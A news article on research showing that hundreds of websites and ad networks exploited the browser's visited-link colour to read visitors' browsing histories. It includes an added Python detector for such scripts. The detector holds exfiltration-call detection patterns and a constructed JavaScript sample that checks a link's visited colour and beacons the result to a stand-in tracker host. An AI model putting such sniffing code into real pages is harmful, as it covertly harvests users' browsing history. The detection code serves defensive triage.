Researchers at the University of California San Diego have discovered a bug that many sites are using to track the browsing behavior of their visitors. The flaw was found on some 485 websites, including YouPorn, Perez Hilton and Wired, and reportedly reveals all of the other sites that each user has previously visited. Of the 485 sites affected by the bug, 63 were found to be copying the data, while 46 were "hijacking" user information, usually to target ads, or find out which rival sites users had visited.
The bug extracts browsing information via a color-changing mechanism that many browsers use to mark sites that you've already visited. A script on YouPorn, for example, would exploit the privacy leak to check which other links to porn sites have already been changed to purple (meaning that you've already clicked on them). "Our study shows that popular Web 2.0 applications like mashups, aggregators, and sophisticated ad targeting are rife with different kinds of privacy-violating flows," the researchers wrote [PDF].
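The mechanism above leaves a recognisable footprint in page scripts: a list of candidate URLs, anchor elements created for them, and a read of each link's rendered colour. The following heuristic checker is an added example written for this article; it is not code from the UC San Diego researchers, Forbes, or any site named here, and the two JavaScript fragments it scans are constructed stand-ins, not scripts captured from those sites. It scores a script by how many of these indicators co-occur, which is the kind of first-pass triage a site operator could run over third-party ad or analytics code before it ships.

```python
"""Heuristic static check for CSS :visited history-sniffing scripts.

Constructed example for this article (not from the paper or any site
named in it). Scans JavaScript source for the combination of behaviours
the article describes: a script injects many candidate links and reads
their rendered colour to learn which ones the browser has marked visited.
Individual indicators are common in legitimate code; the score reflects
how many of them appear together in one script.
"""
import re
from dataclasses import dataclass, field

# (indicator name, pattern, weight). Weights are the author's judgement
# of how specific each signal is to history sniffing.
INDICATORS = [
    ("reads_computed_style",
     re.compile(r"\bgetComputedStyle\s*\(|\.currentStyle\b"), 2),
    ("reads_link_color",
     re.compile(r"\.(?:color|backgroundColor)\b|getPropertyValue\(\s*['\"]color['\"]"), 1),
    ("creates_anchors",
     re.compile(r"createElement\s*\(\s*['\"]a['\"]\s*\)|<a\s+href="), 1),
    # Three or more literal URLs in one array literal: a candidate list.
    ("iterates_url_list",
     re.compile(r"\[\s*(?:['\"]https?://[^'\"]+['\"]\s*,\s*){3,}"), 2),
    # The default visited-link colour (purple) or an explicit visited check.
    ("compares_visited_color",
     re.compile(r"rgb\(\s*128\s*,\s*0\s*,\s*128\s*\)|#800080|\bpurple\b|['\"]visited['\"]", re.I), 2),
    ("exfiltrates_result",
     re.compile(r"\b(?:XMLHttpRequest|fetch|sendBeacon)\b|new\s+Image\(\)"), 1),
]


@dataclass
class Finding:
    score: int
    matched: list = field(default_factory=list)
    verdict: str = ""


def analyse(js_source: str, threshold: int = 6) -> Finding:
    """Return the indicators matched in js_source and a verdict.

    A script reaching `threshold` is flagged for manual review; the
    threshold is a constructed default, not a calibrated value.
    """
    finding = Finding(score=0)
    for name, pattern, weight in INDICATORS:
        if pattern.search(js_source):
            finding.matched.append(name)
            finding.score += weight
    finding.verdict = ("history-sniffing-suspect"
                       if finding.score >= threshold else "benign")
    return finding


# Constructed sample: ordinary layout code that also reads computed style.
BENIGN_SCRIPT = """
var el = document.getElementById("sidebar");
var w = parseInt(getComputedStyle(el).width, 10);
if (w < 200) { el.classList.add("compact"); }
"""

# Constructed sample: the indicator fragments described in the article,
# assembled only to exercise the checker (example.* hosts, not real sites).
SUSPECT_SCRIPT = """
var candidates = ["https://example.org/a", "https://example.net/b",
                  "https://example.com/c", "https://example.edu/d"];
var a = document.createElement("a");
var seen = getComputedStyle(a).color === "rgb(128, 0, 128)";
new Image().src = "//tracker.invalid/?v=" + seen;
"""

if __name__ == "__main__":
    for label, src in (("benign", BENIGN_SCRIPT), ("suspect", SUSPECT_SCRIPT)):
        result = analyse(src)
        print(f"{label}: score={result.score} verdict={result.verdict} "
              f"matched={result.matched}")
```

The benign fragment trips only the computed-style indicator and stays well under the threshold; the suspect fragment trips all six. A real deployment would run this over every third-party script a page loads and hand anything flagged to a reviewer, since a regex heuristic of this kind cannot follow minified or obfuscated code and is meant to prioritise, not to decide.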
Forbes's Kashmir Hill investigated the sites mentioned in the paper, and discovered that some, including YouPorn and PixMac, had created the code themselves. Others, meanwhile, seemed to obtain it from third-party developers. Hill's trail ultimately led to three advertising networks, including one called Interclick. "Interclick purchases anonymous audience data from several vendors for the purpose of targeting advertising campaigns," the company said in a statement provided to Forbes. "Consequently, it has a number of quality control measures in place to understand the quality and effectiveness of this data. The code observed in the paper was a quality measure being tested."
A spokesman for Morningstar, a finance site cited in the paper, insists that the company was unaware that Interclick had gathered user information via the script. In that particular case, the code automatically scanned a visitor's browsing history for any car sites he or she had previously visited. Interclick, however, says that the test was unsuccessful, and that it stopped running the script in October.